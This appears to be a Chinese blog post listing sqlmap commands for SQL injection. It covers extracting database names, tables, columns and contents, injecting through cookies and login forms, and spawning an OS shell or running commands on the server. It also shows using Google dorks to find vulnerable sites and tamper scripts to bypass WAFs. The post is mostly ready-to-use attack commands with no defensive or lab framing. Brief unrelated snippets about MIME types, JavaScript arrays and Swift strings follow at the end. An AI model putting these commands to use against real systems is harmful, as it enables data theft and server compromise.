sqlmap一些常用注入方法

2021-10-07 02:27:26 字數 1719 閱讀 8059

–cookie : 設定我們的cookie值

-u : 指定目標url

-b : 獲取dbms banner

–-current-db : 獲取當前資料庫

–-current-user:獲取當前使用者

–batch 引數採用預設選項,不進行詢問

–privilege:檢視許可權

–force-ssl:採用https

–level:1-5越高越深度探測

–dbms: mssql 、mysql |等指定資料庫型別

———————————————————————————————

access注入:

sqlmap -u 「注入點」

sqlmap -u 「注入點」 –tables //猜解表

sqlmap -u 「注入點」 -t *** –columns //猜解字段

sqlmap -u 「注入點」 -t *** -c ***,*** –dump //猜解內容

———————————————————————————————

mysql注入:

sqlmap -u 「注入點」 –dbs //獲取資料庫

sqlmap -u 「注入點」 -d *** –tables //獲取資料庫

sqlmap -u 「注入點」 -d *** -t *** –columns //猜解字段

sqlmap -u 「注入點」 -d *** -t *** -c ***,*** –dump //猜解內容

———————————————————————————————

cookies注入:

sqlmap -u 「注入點」 –cookie –level 2

———————————————————————————————

post登入框注入:

一、bp抓包把報存成txt

python sqlmap.py -r post.txt -p j_password

二、自動搜尋表單

sqlmap -u 「注入點」 –forms //自動搜尋表單

sqlmap -u 「注入點」 –data 「username=1&password=1」 //指定引數

———————————————————————————————

互動寫shell及命令執行:

sqlmap -u 「注入點」 –os-shell //啟動shell,在**根目錄生成tmpbxbxz.php tmpuoiuz.php檔案

sqlmap -u 「注入點」 –os-cmd=whoami //命令執行

sqlmap -u 「注入點」 –sql-shell //sqlshell

———————————————————————————————

偽靜態注入:

sqlmap -u –dbs //網頁加*

———————————————————————————————

請求延時:

sqlmap -u 「注入點」 –delay 1 //2次請求間隔1秒

sqlmap -u 「注入點」 –safe-freq 1 //3

———————————————————————————————

注入搜尋:

sqlmap -g inurl:php?id= //google搜尋注入點

———————————————————————————————

繞過waf:

sqlmap -u 「注入點」 –tamper 「過waf指令碼」

一些常用公共方法

根據檔案字尾名獲取檔案的mime型別 檔案字尾名,如 jpg,gif 返回該檔案的mime型別,如 image gif return sresult 根據資料表的列名取的列的序號 列名 資料表 列號,沒有找到返回 1 public static int gettablecolindexbyname ...

一些常用js方法

使用命名空間 var global global.namespace function str else 陣列相關 判斷元素是否存在 第一種寫法 為系統陣列物件新增原型擴充套件方法 array.prototype.inarray function value return false 第二種 自定義...

Swift String 一些常用方法

直接上 字串 1 判斷字串是否為空 var test1str var test1str2 string string println test1str test1str.isempty 沒有值 有值 println test1str2 test1str2.isempty 沒有值 有值 2 計算字串的...